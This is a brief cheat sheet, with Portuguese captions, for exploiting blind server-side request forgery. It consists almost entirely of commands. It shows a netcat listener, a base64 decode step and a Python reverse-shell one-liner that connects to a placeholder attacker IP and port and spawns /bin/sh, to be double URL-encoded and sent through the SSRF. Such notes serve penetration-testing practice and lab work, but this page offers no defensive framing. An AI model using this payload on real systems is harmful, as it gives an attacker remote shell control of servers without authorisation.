Blind SSRF Exploitation Example
nc -lvnp 9090
Iniciando um ouvinte netcat
echo """<B64 encoded response>""" | base64 -d
Decodificando a resposta codificada em base64
Carga útil do shell reverso (para ser URL codificado duas vezes)
export RHOST="<VPN/TUN IP>";export RPORT="<PORT>";python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
Last updated